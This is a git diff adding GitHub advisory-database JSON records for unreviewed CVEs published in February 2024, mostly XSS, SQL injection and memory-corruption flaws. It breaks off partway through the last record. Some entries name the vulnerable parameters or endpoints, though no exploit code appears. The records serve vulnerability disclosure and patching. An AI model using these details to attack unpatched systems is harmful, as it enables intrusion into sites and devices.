a/advisories/unreviewed/2024/02/GHSA-jc8h-8h7p-qc4h/GHSA-jc8h-8h7p-qc4h.json b/advisories/unreviewed/2024/02/GHSA-jc8h-8h7p-qc4h/GHSA-jc8h-8h7p-qc4h.json new file mode 100644 index 0000000000000..897f1872a4e2d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jc8h-8h7p-qc4h/GHSA-jc8h-8h7p-qc4h.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jc8h-8h7p-qc4h", + "modified": "2024-02-03T06:30:24Z", + "published": "2024-02-03T06:30:24Z", + "aliases": [ + "CVE-2024-0895" + ], + "details": "The PDF Flipbook, 3D Flipbook – DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to, and including, 2.2.26 due to insufficient input sanitization and output escaping on user supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0895" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jcfq-f3pm-f9px/GHSA-jcfq-f3pm-f9px.json b/advisories/unreviewed/2024/02/GHSA-jcfq-f3pm-f9px/GHSA-jcfq-f3pm-f9px.json new file mode 100644 index 0000000000000..f6240b1af73d0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jcfq-f3pm-f9px/GHSA-jcfq-f3pm-f9px.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcfq-f3pm-f9px", + "modified": "2024-02-08T12:30:48Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2024-24881" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc allows Reflected XSS.This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.5.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24881" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jhwv-44fv-jwp5/GHSA-jhwv-44fv-jwp5.json b/advisories/unreviewed/2024/02/GHSA-jhwv-44fv-jwp5/GHSA-jhwv-44fv-jwp5.json new file mode 100644 index 0000000000000..c0de923bee3ba --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jhwv-44fv-jwp5/GHSA-jhwv-44fv-jwp5.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhwv-44fv-jwp5", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-22667" + ], + "details": "Vim before 9.0.2142 has a stack-based buffer overflow because did_set_langmap in map.c calls sprintf to write to the error buffer that is passed down to the option callback functions.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22667" + }, + { + "type": "WEB", + "url": "https://github.com/vim/vim/commit/b39b240c386a5a29241415541f1c99e2e6b8ce47" + }, + { + "type": "WEB", + "url": "https://gist.githubusercontent.com/henices/2467e7f22dcc2aa97a2453e197b55a0c/raw/7b54bccc9a129c604fb139266f4497ab7aaa94c7/gistfile1.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jjhm-fvgh-hv85/GHSA-jjhm-fvgh-hv85.json b/advisories/unreviewed/2024/02/GHSA-jjhm-fvgh-hv85/GHSA-jjhm-fvgh-hv85.json new file mode 100644 index 0000000000000..4249e3bcbc924 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jjhm-fvgh-hv85/GHSA-jjhm-fvgh-hv85.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjhm-fvgh-hv85", + "modified": "2024-02-02T00:31:26Z", + "published": "2024-02-02T00:31:26Z", + "aliases": [ + "CVE-2024-0325" + ], + "details": "In Helix Sync versions prior to 2024.1, a local command injection was identified. Reported by Bryan Riggins.  \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0325" + }, + { + "type": "WEB", + "url": "https://perforce.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jmx5-5g59-g2rw/GHSA-jmx5-5g59-g2rw.json b/advisories/unreviewed/2024/02/GHSA-jmx5-5g59-g2rw/GHSA-jmx5-5g59-g2rw.json new file mode 100644 index 0000000000000..98bed8973b9f9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jmx5-5g59-g2rw/GHSA-jmx5-5g59-g2rw.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jmx5-5g59-g2rw", + "modified": "2024-02-02T00:31:26Z", + "published": "2024-02-02T00:31:26Z", + "aliases": [ + "CVE-2024-1040" + ], + "details": "\n\n\nGessler GmbH WEB-MASTER user account is stored using a weak hashing algorithm. The attacker can restore the passwords by breaking the hashes stored on the device.\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1040" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327", + "CWE-328" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jpv8-vxhj-7qmf/GHSA-jpv8-vxhj-7qmf.json b/advisories/unreviewed/2024/02/GHSA-jpv8-vxhj-7qmf/GHSA-jpv8-vxhj-7qmf.json new file mode 100644 index 0000000000000..725e2969b574b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jpv8-vxhj-7qmf/GHSA-jpv8-vxhj-7qmf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jpv8-vxhj-7qmf", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20819" + ], + "details": "Out out bounds Write vulnerabilities in svc1td_vld_plh_ap of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20819" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jqqj-j2ch-3qv8/GHSA-jqqj-j2ch-3qv8.json b/advisories/unreviewed/2024/02/GHSA-jqqj-j2ch-3qv8/GHSA-jqqj-j2ch-3qv8.json new file mode 100644 index 0000000000000..478c0a87c1f46 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jqqj-j2ch-3qv8/GHSA-jqqj-j2ch-3qv8.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jqqj-j2ch-3qv8", + "modified": "2024-02-07T15:30:48Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2024-24133" + ], + "details": "Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24133" + }, + { + "type": "WEB", + "url": "https://github.com/Hebing123/cve/issues/16" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jr3p-prh6-2crg/GHSA-jr3p-prh6-2crg.json b/advisories/unreviewed/2024/02/GHSA-jr3p-prh6-2crg/GHSA-jr3p-prh6-2crg.json new file mode 100644 index 0000000000000..f62839534a993 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jr3p-prh6-2crg/GHSA-jr3p-prh6-2crg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr3p-prh6-2crg", + "modified": "2024-02-05T06:30:29Z", + "published": "2024-02-05T06:30:29Z", + "aliases": [ + "CVE-2023-51504" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS.This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51504" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/dans-gcal/wordpress-dan-s-embedder-for-google-calendar-plugin-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jv9f-872m-gv5x/GHSA-jv9f-872m-gv5x.json b/advisories/unreviewed/2024/02/GHSA-jv9f-872m-gv5x/GHSA-jv9f-872m-gv5x.json new file mode 100644 index 0000000000000..bc426b736d119 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jv9f-872m-gv5x/GHSA-jv9f-872m-gv5x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jv9f-872m-gv5x", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51532" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Icegram Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building allows Stored XSS.This issue affects Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building: from n/a through 3.1.19.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51532" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/icegram/wordpress-icegram-engage-plugin-3-1-19-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json b/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json new file mode 100644 index 0000000000000..6c42c7b084306 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxjp-cv56-m425", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-24015" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL via /sys/user/exit", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24015" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24015.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jxrx-5cg2-pj56/GHSA-jxrx-5cg2-pj56.json b/advisories/unreviewed/2024/02/GHSA-jxrx-5cg2-pj56/GHSA-jxrx-5cg2-pj56.json new file mode 100644 index 0000000000000..66c51725519af --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jxrx-5cg2-pj56/GHSA-jxrx-5cg2-pj56.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxrx-5cg2-pj56", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50933" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 275113.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50933" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275113" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m285-497c-62j9/GHSA-m285-497c-62j9.json b/advisories/unreviewed/2024/02/GHSA-m285-497c-62j9/GHSA-m285-497c-62j9.json new file mode 100644 index 0000000000000..72d658144a67f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m285-497c-62j9/GHSA-m285-497c-62j9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m285-497c-62j9", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6846" + ], + "details": "The File Manager Pro plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 8.3.4 via the mk_check_filemanager_php_syntax AJAX function. This makes it possible for authenticated attackers, with subscriber access and above, to execute code on the server. Version 8.3.5 introduces a capability check that prevents users lower than admin from executing this function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6846" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Kun19/046b2b305cac5f2edd38037984c2e8e3" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1e8e0257-a745-495f-a103-c032b95209fc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m293-hr45-hwwr/GHSA-m293-hr45-hwwr.json b/advisories/unreviewed/2024/02/GHSA-m293-hr45-hwwr/GHSA-m293-hr45-hwwr.json new file mode 100644 index 0000000000000..91b96f8530773 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m293-hr45-hwwr/GHSA-m293-hr45-hwwr.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m293-hr45-hwwr", + "modified": "2024-02-03T09:30:18Z", + "published": "2024-02-03T09:30:18Z", + "aliases": [ + "CVE-2023-49950" + ], + "details": "The Jinja templating in Logpoint SIEM 6.10.0 through 7.x before 7.3.0 does not correctly sanitize log data being displayed when using a custom Jinja template in the Alert view. A remote attacker can craft a cross-site scripting (XSS) payload and send it to any system or device that sends logs to the SIEM. If an alert is created, the payload will execute upon the alert data being viewed with that template, which can lead to sensitive data disclosure.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49950" + }, + { + "type": "WEB", + "url": "https://github.com/shrikeinfosec/cve-2023-49950/blob/main/cve-2023-49950.md" + }, + { + "type": "WEB", + "url": "https://servicedesk.logpoint.com/hc/en-us/articles/14124495377437-Stored-XSS-Vulnerability-in-Alerts-via-Log-Injection" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T09:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m3w9-hqpm-7769/GHSA-m3w9-hqpm-7769.json b/advisories/unreviewed/2024/02/GHSA-m3w9-hqpm-7769/GHSA-m3w9-hqpm-7769.json new file mode 100644 index 0000000000000..18ca9f2b734c7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m3w9-hqpm-7769/GHSA-m3w9-hqpm-7769.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3w9-hqpm-7769", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51548" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Neil Gee SlickNav Mobile Menu allows Stored XSS.This issue affects SlickNav Mobile Menu: from n/a through 1.9.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51548" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/slicknav-mobile-menu/wordpress-slicknav-mobile-menu-plugin-1-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m4jj-vwgj-qpjf/GHSA-m4jj-vwgj-qpjf.json b/advisories/unreviewed/2024/02/GHSA-m4jj-vwgj-qpjf/GHSA-m4jj-vwgj-qpjf.json new file mode 100644 index 0000000000000..efa030544431e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m4jj-vwgj-qpjf/GHSA-m4jj-vwgj-qpjf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4jj-vwgj-qpjf", + "modified": "2024-02-06T12:30:30Z", + "published": "2024-02-06T12:30:30Z", + "aliases": [ + "CVE-2024-24936" + ], + "details": "In JetBrains TeamCity before 2023.11.2 access control at the S3 Artifact Storage plugin endpoint was missed", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24936" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m5gq-732f-j9v6/GHSA-m5gq-732f-j9v6.json b/advisories/unreviewed/2024/02/GHSA-m5gq-732f-j9v6/GHSA-m5gq-732f-j9v6.json new file mode 100644 index 0000000000000..935b545e057c6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m5gq-732f-j9v6/GHSA-m5gq-732f-j9v6.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5gq-732f-j9v6", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2024-25189" + ], + "details": "libjwt 1.15.3 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25189" + }, + { + "type": "WEB", + "url": "https://github.com/P3ngu1nW/CVE_Request/blob/main/benmcollins%3Alibjwt.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m6p7-jxxh-vc8c/GHSA-m6p7-jxxh-vc8c.json b/advisories/unreviewed/2024/02/GHSA-m6p7-jxxh-vc8c/GHSA-m6p7-jxxh-vc8c.json new file mode 100644 index 0000000000000..01431c7dad83a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m6p7-jxxh-vc8c/GHSA-m6p7-jxxh-vc8c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m6p7-jxxh-vc8c", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20812" + ], + "details": "Out-of-bounds Write in padmd_vld_htbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20812" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m8v6-ghjm-p88m/GHSA-m8v6-ghjm-p88m.json b/advisories/unreviewed/2024/02/GHSA-m8v6-ghjm-p88m/GHSA-m8v6-ghjm-p88m.json new file mode 100644 index 0000000000000..b066a44039f55 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m8v6-ghjm-p88m/GHSA-m8v6-ghjm-p88m.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8v6-ghjm-p88m", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2023-32967" + ], + "details": "An incorrect authorization vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to bypass intended access restrictions via a network.\nQTS 5.x, QuTS hero are not affected.\n\nWe have already fixed the vulnerability in the following versions:\nQuTScloud c5.1.5.2651 and later\nQTS 4.5.4.2627 build 20231225 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32967" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285", + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mc3m-gj6r-2fhp/GHSA-mc3m-gj6r-2fhp.json b/advisories/unreviewed/2024/02/GHSA-mc3m-gj6r-2fhp/GHSA-mc3m-gj6r-2fhp.json new file mode 100644 index 0000000000000..13cefa65dcd4f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mc3m-gj6r-2fhp/GHSA-mc3m-gj6r-2fhp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mc3m-gj6r-2fhp", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-0242" + ], + "details": "Under certain circumstances IQ Panel4 and IQ4 Hub panel software prior to version 4.4.2 could allow unauthorized access to settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0242" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01" + }, + { + "type": "WEB", + "url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T20:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mch6-54rg-c2wq/GHSA-mch6-54rg-c2wq.json b/advisories/unreviewed/2024/02/GHSA-mch6-54rg-c2wq/GHSA-mch6-54rg-c2wq.json new file mode 100644 index 0000000000000..7abe51fec69cf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mch6-54rg-c2wq/GHSA-mch6-54rg-c2wq.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mch6-54rg-c2wq", + "modified": "2024-02-07T03:30:33Z", + "published": "2024-02-07T03:30:33Z", + "aliases": [ + "CVE-2024-1269" + ], + "details": "A vulnerability has been found in SourceCodester Product Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /supplier.php. The manipulation of the argument supplier_name/supplier_contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253012.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1269" + }, + { + "type": "WEB", + "url": "https://github.com/PrecursorYork/Product-Management-System-Using-PHP-and-MySQL-Reflected-XSS-POC/blob/main/README.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253012" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253012" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], 